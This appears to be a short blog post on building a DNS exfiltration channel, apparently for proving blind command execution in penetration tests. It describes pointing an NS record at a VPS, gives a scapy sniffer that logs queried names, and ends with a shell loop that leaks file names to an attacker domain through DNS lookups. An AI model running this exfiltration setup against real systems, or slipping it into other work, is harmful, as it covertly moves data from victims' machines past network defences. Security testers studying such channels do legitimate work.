In order for you to get a basic DNS exfil setup to work you'll need a couple things:
- A VPS to sniff the DNS queries
- A domain to direct the DNS queries to
The first step is to configure an NS record for a subdomain of your main domain. I simply created an NS record for e.domain.tld (replace domain.tld with your domain) and pointed it to the IP address of VPS.
Now when someone requests somedata.e.domain.tld the UDP request packet will go to the VPS IP. Run tshark/tcpdump to grab the request and prove if you have command execution or not.
I partially wrote the following python script to just parse out the domain name being requested.
#!/usr/bin/env python2 from scapy.all import * from scapy.layers.dns import DNSRR, DNS, DNSQR def handlepkt(p): #thanks stackoverflow! if p.haslayer(DNS): if p.qdcount > 0 and isinstance(p.qd, DNSQR): name = p.qd.qname elif p.ancount > 0 and isinstance(p.an, DNSRR): name = p.an.rdata print name sniff(iface=eth0, filter="udp and port 53", store=0, prn=handlepkt)
Since your DNS settings are configured properly, just start the python sniffer and run something like
for i in *; do host $i.e.domain.tld; done
And watch the requests come in.
No comments:
Post a Comment